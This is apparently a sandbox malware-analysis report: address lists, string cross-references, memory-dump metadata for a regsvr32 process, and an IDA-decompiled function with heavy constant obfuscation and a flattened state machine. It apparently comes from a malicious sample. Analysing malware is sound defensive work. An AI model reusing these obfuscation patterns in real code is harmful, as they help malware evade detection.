0x04b8b1dd
0x04b8b1e3
0x04b8b1eb
0x04b8b1f3
0x04b8b1fe
0x04b8b209
0x04b8b214
0x04b8b21f
0x04b8b22a
0x04b8b235
0x04b8b240
0x04b8b24b
0x04b8b253
0x04b8b25e
0x04b8b270
0x04b8b275
0x04b8b27e
0x04b8b289
0x04b8b294
0x04b8b2a6
0x04b8b2ab
0x04b8b2bc
0x04b8b2bf
0x04b8b2c6
0x04b8b2d1
0x04b8b2e4
0x04b8b2eb
0x04b8b2f6
0x04b8b301
0x04b8b309
0x04b8b314
0x04b8b324
0x04b8b32d
0x04b8b330
0x04b8b33c
0x04b8b340
0x04b8b348
0x04b8b35a
0x04b8b35d
0x04b8b364
0x04b8b36f
0x04b8b377
0x04b8b37f
0x04b8b384
0x04b8b389
0x04b8b391
0x04b8b39c
0x04b8b3a7
0x04b8b3b2
0x04b8b3ba
0x04b8b3c2
0x04b8b3cf
0x04b8b3d3
0x04b8b3e2
0x04b8b3e7
0x04b8b3ee
0x04b8b3ee
0x04b8b3f0
0x04b8b3f0
0x04b8b3f0
0x04b8b3f0
0x04b8b3f6
0x00000000
0x00000000
0x04b8b3fc
0x04b8b668
0x04b8b66e
0x04b8b66f
0x00000000
0x04b8b402
0x04b8b408
0x04b8b5b7
0x04b8b5c0
0x04b8b5c4
0x04b8b5da
0x04b8b61d
0x04b8b629
0x04b8b640
0x04b8b645
0x04b8b648
0x00000000
0x04b8b40e
0x04b8b414
0x04b8b57a
0x04b8b599
0x04b8b5a5
0x04b8b5aa
0x04b8b5ad
0x00000000
0x04b8b41a
0x04b8b420
0x04b8b473
0x04b8b49b
0x04b8b4bc
0x04b8b4c9
0x04b8b4cd
0x04b8b4d4
0x04b8b523
0x04b8b543
0x04b8b548
0x04b8b561
0x04b8b567
0x04b8b568
0x04b8b56a
0x04b8b570
0x00000000
0x04b8b570
0x04b8b422
0x04b8b428
0x00000000
0x04b8b814
0x04b8b434
0x00000000
0x04b8b43a
0x04b8b451
0x04b8b457
0x04b8b458
0x00000000
0x04b8b458
0x00000000
0x04b8b434
0x04b8b420
0x04b8b414
0x04b8b408
0x04b8b81f
0x04b8b81f
0x00000000
0x04b8b81f
0x04b8b679
0x04b8b67f
0x04b8b7d3
0x04b8b7d8
0x04b8b7db
0x04b8b7dc
0x04b8b7de
0x04b8b7ea
0x00000000
0x04b8b7e0
0x04b8b7e0
0x00000000
0x04b8b7e0
0x00000000
0x04b8b685
0x04b8b685
0x04b8b68b
0x04b8b78e
0x04b8b79c
0x04b8b7a6
0x04b8b7ae
0x04b8b7af
0x00000000
0x04b8b691
0x04b8b691
0x04b8b697
0x04b8b753
0x04b8b767
0x04b8b76e
0x04b8b773
0x04b8b776
0x00000000
0x04b8b69d
0x04b8b69d
0x04b8b6a3
0x00000000
0x04b8b6a9
0x04b8b6c3
0x04b8b6ca
0x04b8b6cf
0x04b8b6ed
0x04b8b71c
0x04b8b723
0x04b8b728
0x04b8b72b
0x04b8b72d
0x04b8b733
0x00000000
0x04b8b733
0x04b8b72d
0x04b8b6a3
0x04b8b697
0x04b8b68b
0x00000000
0x04b8b7ef
0x04b8b7ef
0x04b8b7ef
0x00000000

Strings

2iJ, xrefs: 04B8B022
$P, xrefs: 04B8A936
9, xrefs: 04B8B176
B:, xrefs: 04B8AC44
~63, xrefs: 04B8B753
N , xrefs: 04B8ACB7
xs,, xrefs: 04B8AAF1
QGgf, xrefs: 04B8ADBA
/e, xrefs: 04B8ABEA
\\, xrefs: 04B8AA54
HMJ9, xrefs: 04B8AFE7
05, xrefs: 04B8AEE5
BbJ, xrefs: 04B8A981
l+}, xrefs: 04B8B309
!., xrefs: 04B8AE4A
~63, xrefs: 04B8AC1E, 04B8AF5E, 04B8AF4D
uv, xrefs: 04B8AE55
K, xrefs: 04B8B186
h, xrefs: 04B8ABA4

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: h$!.$$P$/e$05$2iJ$B:$BbJ$HMJ9$K$N $QGgf$\\$uv$xs,$~63$~63$9$l+}
API String ID: 0-4215899151
Opcode ID: 1353b2e0fbff738433ad48e738c4d4281d3224b3dc72433b6ede15958228e669
Instruction ID: 80516690abc8b23677ebc66e82cf170ffb6ee00c927d07415d6ededf94a1fbc6
Opcode Fuzzy Hash: 1353b2e0fbff738433ad48e738c4d4281d3224b3dc72433b6ede15958228e669
Instruction Fuzzy Hash: 4772EE725093819FD378DF21D58AB8BBBE2BBC4304F10891DE5D996260DBB19958CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B90F86, Relevance: 23.2, Strings: 18, Instructions: 723
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B90F86(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				void* _t824;
				void* _t825;
				void* _t829;
				void* _t832;
				void* _t844;
				void* _t850;
				void* _t853;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				void* _t882;
				void* _t901;
				void* _t957;
				intOrPtr _t975;
				intOrPtr* _t978;
				signed int _t980;
				signed int _t981;
				void* _t982;
				intOrPtr _t986;
				void* _t987;
				void* _t994;
				void* _t996;

				_t978 = __ecx;
				_v96 = __ecx;
				_v88 = 0xce16ef;
				_t986 = 0;
				_t853 = 0x87433f6;
				_v84 = 0;
				_v80 = 0;
				_v412 = 0xef09b0;
				_v412 = _v412 + 0xffff239a;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0xffffb1af;
				_v412 = _v412 ^ 0xffffb567;
				_v144 = 0xb2550e;
				_v144 = _v144 << 6;
				_v144 = _v144 ^ 0x2c954380;
				_v160 = 0xa1df5c;
				_v160 = _v160 * 0x60;
				_v160 = _v160 ^ 0x3cb3c280;
				_v288 = 0x7a32d8;
				_v288 = _v288 | 0x8c6c9666;
				_v288 = _v288 ^ 0x041f8caf;
				_v288 = _v288 ^ 0x88613a51;
				_v348 = 0xdf5e12;
				_v348 = _v348 | 0xa5ea5eb7;
				_v348 = _v348 ^ 0xa5ff5eb7;
				_v296 = 0x7009ff;
				_v296 = _v296 + 0xffff1527;
				_v296 = _v296 + 0x576a;
				_v296 = _v296 ^ 0x006f7690;
				_v372 = 0x1f54b;
				_t860 = 0x52;
				_v372 = _v372 * 0x5a;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 / _t860;
				_v372 = _v372 ^ 0x00000044;
				_v332 = 0x772df1;
				_v332 = _v332 + 0x4853;
				_v332 = _v332 ^ 0x166147d5;
				_v332 = _v332 ^ 0x16163191;
				_v240 = 0x1a1abb;
				_v240 = _v240 ^ 0xbdfc81b5;
				_v240 = _v240 | 0x1ef02f35;
				_v240 = _v240 ^ 0xbff6bf3f;
				_v232 = 0x620327;
				_v232 = _v232 + 0xffffc934;
				_t861 = 0x13;
				_v232 = _v232 / _t861;
				_v232 = _v232 ^ 0x000525b3;
				_v208 = 0xe2fff2;
				_t980 = 0x39;
				_v208 = _v208 * 0x78;
				_v208 = _v208 ^ 0x6a67f970;
				_v344 = 0xf3734c;
				_v344 = _v344 >> 0x10;
				_v344 = _v344 / _t980;
				_v344 = _v344 ^ 0x00000004;
				_v300 = 0x170e40;
				_v300 = _v300 | 0xfbde795f;
				_v300 = _v300 ^ 0xfbde9330;
				_v260 = 0xd4f3ae;
				_v260 = _v260 ^ 0x9e22b963;
				_v260 = _v260 * 0x2e;
				_v260 = _v260 ^ 0x904fea8f;
				_v356 = 0x4c8d9b;
				_v356 = _v356 | 0xd47535dd;
				_v356 = _v356 + 0xffffd433;
				_t862 = 0x64;
				_v356 = _v356 * 0x59;
				_v356 = _v356 ^ 0xdfa15942;
				_v308 = 0xbd9260;
				_v308 = _v308 >> 0xe;
				_v308 = _v308 * 0x79;
				_v308 = _v308 ^ 0x000cbe7b;
				_v252 = 0xa2f51d;
				_v252 = _v252 + 0x749;
				_v252 = _v252 << 0xd;
				_v252 = _v252 ^ 0x5f854687;
				_v292 = 0x216e58;
				_v292 = _v292 / _t862;
				_v292 = _v292 + 0xffff8880;
				_v292 = _v292 ^ 0xfff3b1bc;
				_v176 = 0xac4eb4;
				_v176 = _v176 | 0xd866b52c;
				_v176 = _v176 ^ 0xd8e8b8b7;
				_v236 = 0x7a6201;
				_v236 = _v236 ^ 0x2461ec4e;
				_t863 = 0xa;
				_v236 = _v236 * 0x35;
				_v236 = _v236 ^ 0x79bb4b53;
				_v220 = 0xf5a9fb;
				_v220 = _v220 << 1;
				_v220 = _v220 >> 5;
				_v220 = _v220 ^ 0x000a39a7;
				_v380 = 0x7beff6;
				_v380 = _v380 / _t863;
				_v380 = _v380 | 0x5a206f9b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x7c9823d9;
				_v284 = 0xdc7201;
				_v284 = _v284 ^ 0xec4f9d75;
				_v284 = _v284 << 8;
				_v284 = _v284 ^ 0x93e140b6;
				_v396 = 0x36b797;
				_v396 = _v396 + 0x83f2;
				_v396 = _v396 | 0xb5da4ffa;
				_v396 = _v396 ^ 0x8c9f27f1;
				_v396 = _v396 ^ 0x3962cb66;
				_v364 = 0x608af6;
				_v364 = _v364 >> 0xe;
				_v364 = _v364 ^ 0xb06c2668;
				_v364 = _v364 >> 0xa;
				_v364 = _v364 ^ 0x0022b374;
				_v404 = 0xe18b1f;
				_v404 = _v404 + 0xffff49de;
				_v404 = _v404 + 0xffffa950;
				_v404 = _v404 >> 5;
				_v404 = _v404 ^ 0x000802e7;
				_v168 = 0x720eed;
				_v168 = _v168 | 0xf4577aa8;
				_v168 = _v168 ^ 0xf4704e8f;
				_v328 = 0x5e39f;
				_v328 = _v328 * 0x2a;
				_v328 = _v328 ^ 0x47860790;
				_v328 = _v328 ^ 0x47706e69;
				_v336 = 0xdd3db6;
				_v336 = _v336 ^ 0x0be1064e;
				_v336 = _v336 ^ 0xe0fa941c;
				_v336 = _v336 ^ 0xebc1ff07;
				_v340 = 0x8bacdf;
				_t864 = 0x49;
				_v340 = _v340 / _t864;
				_t865 = 0x77;
				_v340 = _v340 * 0x4d;
				_v340 = _v340 ^ 0x0099a7e7;
				_v440 = 0x29fcf0;
				_v440 = _v440 >> 4;
				_v440 = _v440 ^ 0x37539152;
				_v440 = _v440 / _t865;
				_v440 = _v440 ^ 0x007580f6;
				_v400 = 0x753dd5;
				_v400 = _v400 ^ 0x142a6b84;
				_v400 = _v400 ^ 0x6d30c2ad;
				_v400 = _v400 ^ 0xe014bebf;
				_v400 = _v400 ^ 0x997c2220;
				_v128 = 0x8b3cd;
				_v128 = _v128 << 2;
				_v128 = _v128 ^ 0x002b9a55;
				_v408 = 0x5fd2f;
				_v408 = _v408 >> 9;
				_t866 = 0x69;
				_v408 = _v408 * 0x53;
				_v408 = _v408 * 0x58;
				_v408 = _v408 ^ 0x00501640;
				_v416 = 0x7e5e32;
				_v416 = _v416 | 0x37c3b1cb;
				_v416 = _v416 + 0x4e4b;
				_v416 = _v416 | 0xc7e68b70;
				_v416 = _v416 ^ 0xffec3e94;
				_v304 = 0xac72e0;
				_v304 = _v304 + 0xffff9516;
				_v304 = _v304 | 0x0ab72207;
				_v304 = _v304 ^ 0x0aba1474;
				_v424 = 0x91a63a;
				_v424 = _v424 | 0xeda6ffa9;
				_v424 = _v424 ^ 0xa7761782;
				_v424 = _v424 << 0xe;
				_v424 = _v424 ^ 0x7a08e30a;
				_v436 = 0x9e7f8b;
				_v436 = _v436 | 0x84ca61f6;
				_v436 = _v436 << 2;
				_v436 = _v436 * 0x3e;
				_v436 = _v436 ^ 0xb78cfbfa;
				_v216 = 0x303808;
				_v216 = _v216 + 0xef78;
				_v216 = _v216 / _t980;
				_v216 = _v216 ^ 0x000455e2;
				_v312 = 0x19b522;
				_v312 = _v312 << 7;
				_v312 = _v312 ^ 0x11162953;
				_v312 = _v312 ^ 0x1dcfd305;
				_v212 = 0x8a6fc0;
				_v212 = _v212 << 9;
				_v212 = _v212 ^ 0x14d4ca12;
				_v276 = 0xdb7845;
				_v276 = _v276 / _t866;
				_v276 = _v276 * 0x1c;
				_v276 = _v276 ^ 0x003237f1;
				_v124 = 0x91e545;
				_t867 = 0x7b;
				_v124 = _v124 / _t867;
				_v124 = _v124 ^ 0x0004745c;
				_v192 = 0x2154b3;
				_v192 = _v192 ^ 0x5324a52c;
				_v192 = _v192 ^ 0x530d1a47;
				_v140 = 0x7913eb;
				_v140 = _v140 | 0xe487e648;
				_v140 = _v140 ^ 0xe4fd51cb;
				_v428 = 0x8a554f;
				_v428 = _v428 << 1;
				_v428 = _v428 + 0xffff493d;
				_v428 = _v428 | 0x8f4663f4;
				_v428 = _v428 ^ 0x8f592165;
				_v200 = 0x5c4830;
				_v200 = _v200 + 0xffffe35d;
				_v200 = _v200 ^ 0x00549f8c;
				_v132 = 0x6e2e79;
				_t377 =  &_v132; // 0x6e2e79
				_t981 = 0x62;
				_v132 =  *_t377 / _t981;
				_v132 = _v132 ^ 0x000a369f;
				_v244 = 0x1d0d9a;
				_t868 = 0x6e;
				_v244 = _v244 / _t868;
				_v244 = _v244 ^ 0xec9a9004;
				_v244 = _v244 ^ 0xec94e609;
				_v148 = 0xd4a92;
				_v148 = _v148 + 0xffffbc3f;
				_v148 = _v148 ^ 0x00088ca7;
				_v184 = 0x3666a0;
				_v184 = _v184 >> 0xb;
				_v184 = _v184 ^ 0x00096f18;
				_v228 = 0x713966;
				_v228 = _v228 << 3;
				_v228 = _v228 << 0xb;
				_v228 = _v228 ^ 0x4e5b426e;
				_v316 = 0xec09e9;
				_v316 = _v316 << 7;
				_t869 = 0x78;
				_v316 = _v316 / _t869;
				_v316 = _v316 ^ 0x00fe5880;
				_v268 = 0x8ffe81;
				_v268 = _v268 + 0xffff4311;
				_v268 = _v268 ^ 0x56e15418;
				_v268 = _v268 ^ 0x566a144b;
				_v324 = 0x9f4c2e;
				_v324 = _v324 >> 4;
				_v324 = _v324 | 0x903f3b4d;
				_v324 = _v324 ^ 0x9031b6d7;
				_v196 = 0x6080cf;
				_v196 = _v196 << 0xe;
				_v196 = _v196 ^ 0x203ba000;
				_v256 = 0x4bba45;
				_v256 = _v256 + 0xc17c;
				_v256 = _v256 | 0x95e268b8;
				_v256 = _v256 ^ 0x95e68234;
				_v264 = 0x7821fc;
				_v264 = _v264 << 3;
				_t870 = 0x34;
				_v264 = _v264 / _t870;
				_v264 = _v264 ^ 0x001694e5;
				_v204 = 0x96f3a5;
				_v204 = _v204 * 0x24;
				_v204 = _v204 ^ 0x153e3a4b;
				_v368 = 0xbef911;
				_t871 = 0xe;
				_v368 = _v368 / _t871;
				_v368 = _v368 >> 0xb;
				_v368 = _v368 + 0x5de4;
				_v368 = _v368 ^ 0x00021c01;
				_v376 = 0x377d04;
				_v376 = _v376 + 0xcef;
				_v376 = _v376 ^ 0x9e466b70;
				_t872 = 0x59;
				_v376 = _v376 * 0x6b;
				_v376 = _v376 ^ 0x399834bf;
				_v180 = 0x6632ea;
				_v180 = _v180 | 0x3a3e38fd;
				_v180 = _v180 ^ 0x3a73a81b;
				_v248 = 0x142cd9;
				_v248 = _v248 / _t872;
				_v248 = _v248 / _t981;
				_v248 = _v248 ^ 0x0001d965;
				_v188 = 0x88b8e9;
				_v188 = _v188 + 0xffff5f5f;
				_v188 = _v188 ^ 0x0087927e;
				_v164 = 0x9c013d;
				_t873 = 0xa;
				_v164 = _v164 / _t873;
				_v164 = _v164 ^ 0x0004ead6;
				_v172 = 0x53b5f1;
				_v172 = _v172 + 0xd9f2;
				_v172 = _v172 ^ 0x005588af;
				_v360 = 0xd6ac8a;
				_v360 = _v360 | 0xfdf9fa5f;
				_v360 = _v360 ^ 0xfdfecc4d;
				_v224 = 0xfb951e;
				_v224 = _v224 + 0xffff2e4c;
				_v224 = _v224 + 0x8dcd;
				_v224 = _v224 ^ 0x00f1d24a;
				_v272 = 0x6e5d6f;
				_v272 = _v272 << 2;
				_t874 = 0x6f;
				_v272 = _v272 / _t874;
				_v272 = _v272 ^ 0x000d7a86;
				_v384 = 0x15dc31;
				_v384 = _v384 + 0xfffffc55;
				_v384 = _v384 << 0x10;
				_v384 = _v384 >> 0xa;
				_v384 = _v384 ^ 0x003c4753;
				_v392 = 0x7bc513;
				_v392 = _v392 * 0x54;
				_v392 = _v392 | 0xe01c3b63;
				_v392 = _v392 + 0xe1b2;
				_v392 = _v392 ^ 0xe89c6b16;
				_v420 = 0x6862b7;
				_v420 = _v420 ^ 0x841c6550;
				_v420 = _v420 + 0xd52;
				_v420 = _v420 >> 0x10;
				_v420 = _v420 ^ 0x000e8d54;
				_v388 = 0x19484a;
				_t982 = 0x6f661e6;
				_t875 = 0x68;
				_v388 = _v388 / _t875;
				_t876 = 0xd;
				_v92 = 0x100;
				_v388 = _v388 * 0x61;
				_v388 = _v388 << 6;
				_v388 = _v388 ^ 0x05e5c873;
				_v432 = 0xb160;
				_v432 = _v432 * 0x78;
				_v432 = _v432 >> 8;
				_v432 = _v432 ^ 0xee0de4a9;
				_v432 = _v432 ^ 0xee0e3c37;
				_v320 = 0x436488;
				_v320 = _v320 * 0x7d;
				_v320 = _v320 * 0x24;
				_v320 = _v320 ^ 0xa0a81f1c;
				_v136 = 0x73af31;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x0004ab53;
				_v120 = 0xd23217;
				_v120 = _v120 | 0x86b48086;
				_v120 = _v120 ^ 0x86fe303d;
				_v280 = 0x567562;
				_v280 = _v280 / _t876;
				_v280 = _v280 + 0xffff7ef5;
				_v280 = _v280 ^ 0x00098751;
				_v152 = 0x24c9f6;
				_v152 = _v152 + 0x7f22;
				_v152 = _v152 ^ 0x002f2944;
				_v156 = 0xe548b;
				_v156 = _v156 + 0xe219;
				_v156 = _v156 ^ 0x000a95de;
				_v352 = 0xccf4e9;
				_v352 = _v352 | 0x0ed71748;
				_v352 = _v352 + 0xefd9;
				_v352 = _v352 << 3;
				_v352 = _v352 ^ 0x770f1835;
				while(1) {
					L1:
					while(1) {
						L2:
						while(1) {
							L3:
							_t957 = 0xaefec99;
							do {
								while(1) {
									L4:
									_t996 = _t853 - 0x89f995e;
									if(_t996 > 0) {
										break;
									}
									if(_t996 == 0) {
										E04B9C237(_v108, _v432, _v320, _v136);
										_t853 = 0xc502d5f;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t853 == 0x49f634) {
											_push(_v308);
											_push(_v356);
											_push(_v260);
											_t832 = E04B9E1F8(0x4b813d8, _v300, __eflags);
											_push(_v236);
											_push(_v176);
											_push(_v292);
											__eflags = E04B8738A(_v220, _t832, _v380, _v412,  &_v112, E04B9E1F8(0x4b81318, _v252, __eflags), _v284) - _v144;
											_t853 =  ==  ? 0xc917448 : 0x468e224;
											E04B9FECB(_t832, _v396, _v364, _v404, _v168);
											E04B9FECB(_t833, _v328, _v336, _v340, _v440);
											_t978 = _v96;
											_t987 = _t987 + 0x44;
											goto L31;
										} else {
											if(_t853 == 0x1281fcd) {
												E04B82EBF(_v420, _v104, _v388);
												_t853 = 0x89f995e;
												while(1) {
													L1:
													goto L2;
												}
											} else {
												if(_t853 == _t824) {
													_push(_v212);
													_push(_v312);
													_push(_v216);
													_t985 = E04B9E1F8(0x4b81368, _v436, __eflags);
													_t901 = 0x48;
													_v100 = 0x4b81368;
													_t844 = E04BA16C0(_v276, 0x4b81368, _v116,  &_v100, _v124, _v192, _t841, _v140, _v428, _t901, _v372, _v200, _v132,  &_v76);
													_t994 = _t987 + 0x3c;
													__eflags = _t844 - _v332;
													if(_t844 != _v332) {
														_t853 = 0xc502d5f;
													} else {
														_t975 =  *0x4ba6224; // 0x0
														E04B9C9B0(_v244, _t975 + 8, _v148, 0x40,  &_v68, _v184);
														_t994 = _t994 + 0x10;
														_t853 = 0x9badbc8;
													}
													E04B9FECB(_t985, _v228, _v316, _v268, _v324);
													_t987 = _t994 + 0xc;
													L31:
													_t982 = 0x6f661e6;
													_t824 = 0x38eaa65;
													_t882 = 0xe81b6a7;
													_t957 = 0xaefec99;
													goto L32;
												} else {
													if(_t853 == 0x5c5114f) {
														E04B8F7FE(_v156, _v112, _v352, _v344);
													} else {
														if(_t853 == _t982) {
															_t850 = E04B83431(_v104);
															_t853 = 0x1281fcd;
															__eflags = _t850;
															_t986 =  !=  ? 1 : _t986;
															while(1) {
																L1:
																L2:
																L3:
																_t957 = 0xaefec99;
																goto L4;
															}
														} else {
															if(_t853 != 0x87433f6) {
																goto L32;
															} else {
																_t853 = 0x49f634;
																continue;
															}
														}
													}
												}
											}
										}
									}
									L35:
									return _t986;
								}
								__eflags = _t853 - 0x9badbc8;
								if(__eflags == 0) {
									_push(_v204);
									_push(_v264);
									_push(_v256);
									__eflags = E04B8BC32( *((intOrPtr*)(_t978 + 4)),  &_v108, _v240, _v368, _v376, E04B9E1F8(0x4b81368, _v196, __eflags),  *_t978, _v180, _v248, _v112, 0x4b81368, _v188) - _v232;
									_t853 =  ==  ? 0xaefec99 : 0xc502d5f;
									E04B9FECB(_t819, _v164, _v172, _v360, _v224);
									_t987 = _t987 + 0x40;
									goto L31;
								} else {
									__eflags = _t853 - _t957;
									if(_t853 == _t957) {
										_t825 = E04B851E7( &_v104, _v272, _v116, _v108, _v208, _v384, _v392);
										_t987 = _t987 + 0x14;
										__eflags = _t825;
										_t853 =  ==  ? _t982 : 0x89f995e;
										goto L1;
									} else {
										__eflags = _t853 - 0xc502d5f;
										if(_t853 == 0xc502d5f) {
											E04B9C237(_v116, _v120, _v280, _v152);
											_t853 = 0x5c5114f;
											while(1) {
												L1:
												goto L2;
											}
										} else {
											__eflags = _t853 - 0xc917448;
											if(_t853 == 0xc917448) {
												_v100 = _v92;
												_t829 = E04BA43E6(_v400, _v128, _v408, _v112, _v416, _v160,  &_v116, _v92);
												_t987 = _t987 + 0x18;
												__eflags = _t829 - _v288;
												_t882 = 0xe81b6a7;
												_t824 = 0x38eaa65;
												_t853 =  ==  ? 0xe81b6a7 : 0x5c5114f;
												goto L3;
											} else {
												__eflags = _t853 - _t882;
												if(_t853 != _t882) {
													goto L32;
												} else {
													__eflags = E04B9C2CF(_v304, _v348, _v424, _v116) - _v296;
													_t824 = 0x38eaa65;
													_t853 =  ==  ? 0x38eaa65 : 0xc502d5f;
													goto L2;
												}
											}
										}
									}
								}
								goto L35;
								L32:
								__eflags = _t853 - 0x468e224;
							} while (__eflags != 0);
							goto L35;
						}
					}
				}
			}

0x04b90f90
0x04b90f92
0x04b90f99
0x04b90fa6
0x04b90fa8
0x04b90fad
0x04b90fb4
0x04b90fbb
0x04b90fc3
0x04b90fcb
0x04b90fd0
0x04b90fd8
0x04b90fe0
0x04b90feb
0x04b90ff3
0x04b90ffe
0x04b91013
0x04b9101a
0x04b91025
0x04b91030
0x04b9103b
0x04b91046
0x04b91051
0x04b91059
0x04b91061
0x04b91069
0x04b91074
0x04b9107f
0x04b9108a
0x04b91095
0x04b910a2
0x04b910a5
0x04b910a9
0x04b910b6
0x04b910ba
0x04b910bf
0x04b910ca
0x04b910d5
0x04b910e0
0x04b910eb
0x04b910f6
0x04b91101
0x04b9110c
0x04b91117
0x04b91122
0x04b91134
0x04b91139
0x04b91142
0x04b9114d
0x04b91160
0x04b91161
0x04b91168
0x04b91173
0x04b9117b
0x04b91186
0x04b9118a
0x04b9118f
0x04b9119a
0x04b911a5
0x04b911b0
0x04b911bb
0x04b911ce
0x04b911d7
0x04b911e2
0x04b911ea
0x04b911f2
0x04b91201
0x04b91204
0x04b91208
0x04b91210
0x04b9121b
0x04b9122b
0x04b91232
0x04b9123d
0x04b91248
0x04b91253
0x04b9125b
0x04b91266
0x04b9127c
0x04b91283
0x04b9128e
0x04b91299
0x04b912a4
0x04b912af
0x04b912ba
0x04b912c5
0x04b912d8
0x04b912d9
0x04b912e0
0x04b912eb
0x04b912f6
0x04b912fd
0x04b91305
0x04b91310
0x04b9131e
0x04b91322
0x04b9132f
0x04b91333
0x04b9133b
0x04b91346
0x04b91351
0x04b91359
0x04b91364
0x04b9136c
0x04b91374
0x04b9137c
0x04b91384
0x04b9138c
0x04b91394
0x04b91399
0x04b913a1
0x04b913a6
0x04b913ae
0x04b913b6
0x04b913be
0x04b913c6
0x04b913cb
0x04b913d3
0x04b913de
0x04b913e9
0x04b913f4
0x04b91407
0x04b9140e
0x04b91419
0x04b91424
0x04b9142c
0x04b91434
0x04b9143c
0x04b91444
0x04b91454
0x04b91459
0x04b91464
0x04b91467
0x04b9146b
0x04b91473
0x04b9147b
0x04b91480
0x04b91490
0x04b91494
0x04b9149c
0x04b914a4
0x04b914ac
0x04b914b4
0x04b914bc
0x04b914c4
0x04b914cf
0x04b914d7
0x04b914e2
0x04b914ea
0x04b914f4
0x04b914f5
0x04b914fe
0x04b91502
0x04b9150a
0x04b91512
0x04b9151a
0x04b91522
0x04b9152a
0x04b91532
0x04b9153d
0x04b91548
0x04b91553
0x04b9155e
0x04b91566
0x04b9156e
0x04b91576
0x04b9157b
0x04b91583
0x04b9158b
0x04b91593
0x04b9159d
0x04b915a1
0x04b915a9
0x04b915b4
0x04b915ca
0x04b915d1
0x04b915dc
0x04b915e7
0x04b915ef
0x04b915fa
0x04b91605
0x04b91610
0x04b91618
0x04b91623
0x04b91637
0x04b91646
0x04b9164d
0x04b9165a
0x04b9166e
0x04b91673
0x04b9167c
0x04b91687
0x04b91692
0x04b9169d
0x04b916a8
0x04b916b3
0x04b916be
0x04b916c9
0x04b916d1
0x04b916d5
0x04b916dd
0x04b916e5
0x04b916ed
0x04b916f8
0x04b91703
0x04b9170e
0x04b91719
0x04b91720
0x04b91725
0x04b9172e
0x04b91739
0x04b9174b
0x04b91750
0x04b91759
0x04b91764
0x04b9176f
0x04b9177a
0x04b91785
0x04b91790
0x04b9179b
0x04b917a3
0x04b917ae
0x04b917b9
0x04b917c1
0x04b917c9
0x04b917d4
0x04b917df
0x04b917ee
0x04b917f3
0x04b917fc
0x04b91807
0x04b91812
0x04b9181d
0x04b91828
0x04b91833
0x04b9183e
0x04b91846
0x04b91851
0x04b9185c
0x04b91867
0x04b9186f
0x04b9187a
0x04b91885
0x04b91890
0x04b9189b
0x04b918a6
0x04b918b1
0x04b918c0
0x04b918c3
0x04b918ca
0x04b918d5
0x04b918e8
0x04b918f1
0x04b918fc
0x04b9190a
0x04b9190f
0x04b91913
0x04b91918
0x04b91920
0x04b91928
0x04b91930
0x04b91938
0x04b91947
0x04b9194a
0x04b9194e
0x04b91956
0x04b91961
0x04b9196c
0x04b91977
0x04b9198d
0x04b9199f
0x04b919a6
0x04b919b1
0x04b919bc
0x04b919c7
0x04b919d2
0x04b919e4
0x04b919e9
0x04b919f2
0x04b919fd
0x04b91a08
0x04b91a13
0x04b91a1e
0x04b91a26
0x04b91a36
0x04b91a3e
0x04b91a49
0x04b91a54
0x04b91a5f
0x04b91a6a
0x04b91a75
0x04b91a84
0x04b91a87
0x04b91a8e
0x04b91a99
0x04b91aa1
0x04b91aa9
0x04b91aae
0x04b91ab3
0x04b91abb
0x04b91ac8
0x04b91acc
0x04b91ad4
0x04b91adc
0x04b91ae4
0x04b91aec
0x04b91af4
0x04b91afc
0x04b91b01
0x04b91b09
0x04b91b17
0x04b91b1e
0x04b91b23
0x04b91b2e
0x04b91b2f
0x04b91b3a
0x04b91b3e
0x04b91b43
0x04b91b4b
0x04b91b58
0x04b91b5c
0x04b91b61
0x04b91b69
0x04b91b71
0x04b91b84
0x04b91b93
0x04b91b9a
0x04b91ba5
0x04b91bb0
0x04b91bb8
0x04b91bc3
0x04b91bce
0x04b91bd9
0x04b91be4
0x04b91bf8
